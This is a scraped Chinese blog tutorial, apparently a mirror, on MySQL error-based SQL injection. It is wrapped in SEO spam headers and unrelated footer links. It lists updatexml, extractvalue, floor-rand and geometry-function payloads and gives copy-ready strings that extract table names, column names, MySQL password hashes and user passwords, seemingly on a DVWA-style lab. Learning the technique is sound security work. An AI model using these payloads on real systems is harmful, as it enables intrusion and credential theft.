当前位置: 首页 > news >正文

关键词推广网站重庆网站制作

关键词推广网站,重庆网站制作,什么是网络工程师,泰兴网站建设报错注入报错注入定义代码展示常用的报错语句1.获取数据库名称2.获取mysql账号密码3.获取表名4.获取字段名5.获取账号密码报错注入定义 报错注入:利用sql语句的不规范,获取相关sql提示信息 代码展示 常用的报错语句 select first_name, last_name FROM…

报错注入

    • 报错注入定义
    • 代码展示
    • 常用的报错语句
      • 1.获取数据库名称
      • 2.获取mysql账号密码
      • 3.获取表名
      • 4.获取字段名
      • 5.获取账号密码

报错注入定义

报错注入:利用sql语句的不规范,获取相关sql提示信息

代码展示

在这里插入图片描述

常用的报错语句

select first_name, last_name FROM users where user_id = ‘1’ and info() –
#获取当前使用的库
1’ and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) – 或version() 、database()
#获取数据库敏感信息
1.floor()
select * from test where id=1 and (select 1 from (select
count(),concat(user(),floor(rand(0)2))x from information_schema.tables group by
x)a);
2.extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
3.updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
4.geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select *
from(select user())a)b));
5.multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select
user())a)b));
6.polygon()
select * from test where id=1 and polygon((select * from(select * from(select
user())a)b));
7.multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select
user())a)b));
8.linestring()
select * from test where id=1 and linestring((select * from(select * from(select
user())a)b));
9.multilinestring()
select * from test where id=1 and multilinestring((select * from(select * from(select
user())a)b));
10.exp()
select * from test where id=1 and exp(~(select * from(select user())a));

1.获取数据库名称

1' and info() -- 

在这里插入图片描述

2.获取mysql账号密码

1' and updatexml(1,concat(0x7e,(select (select authentication_string from mysql.user limit 1 )),0x7e),1) -- 
1' and updatexml(1,concat(0x7e,(select (substring((select authentication_string from mysql.user limit 1),32,40))),0x7e),1) -- 

因为一条只能显示32字符,所以两段拼接则为mysql密码
在这里插入图片描述
在这里插入图片描述

3.获取表名

1'and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) -- 

在这里插入图片描述

4.获取字段名

1'and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name='users' LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) -- 

在这里插入图片描述
借助burpsuite

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

5.获取账号密码

1' and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,user,0x3a,password,0x23) FROM users limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) -- 

在这里插入图片描述

http://www.yayakq.cn/news/503289/

相关文章:

  • 广州高端网站制作公司哪家好cn域名不建议购买
  • 百度推广托管公司系统优化大师
  • 静态网站开发网站做网站做任务
  • 菏泽汽车网站建设建一个做笔记的网站
  • 绝缘子网站建设做爰全过程免费狐狸网站
  • 微信如何做微商城网站建设简单的购物网站项目
  • 网站备案不通过怎么解决外链免费发布平台
  • 炒股配资网站建设网站接入服务 公司
  • 数据型网站营销型企业网站建设应遵循的原则
  • dedecms建手机网站流程线切割加工东莞网站建设技术支持
  • 企业网站推广的方式北京市建设规划网站
  • 企业网站模板文件管理上海城隍庙门票多少钱一张
  • 手机上怎么制作网站wordpress 开源地图插件
  • 网站备案怎么弄深圳最好的seo培训
  • 公司网站开通高校网站建设策划
  • 装修平台网站排名前十名有哪些海尔电子商务网站建设预算
  • 深圳做购物网站WordPress谷歌字体会慢
  • 网站建设顾问英语外贸网络营销如何做
  • 做静态头像网站神码ai智能写作网站
  • ps个人网站的首页界面网易云音乐wordpress
  • 效果图在哪个网站可以找比较好辽阳网站设计
  • 网站建设 客户评价汕头人才网
  • 搜索引擎不收录网站百度小程序制作流程
  • 南京建网站深圳网站营销推广公司
  • 网站推广专员面试百度应用
  • wordpress个人展示网站wordpress获取分类标题
  • 赛门博网站建设网站建设的数据库连接
  • 单页购物网站源码客户做网站嫌贵了
  • 虚拟空间的网站赚钱吗wordpress检测
  • 手机上做网站php做网站要交钱吗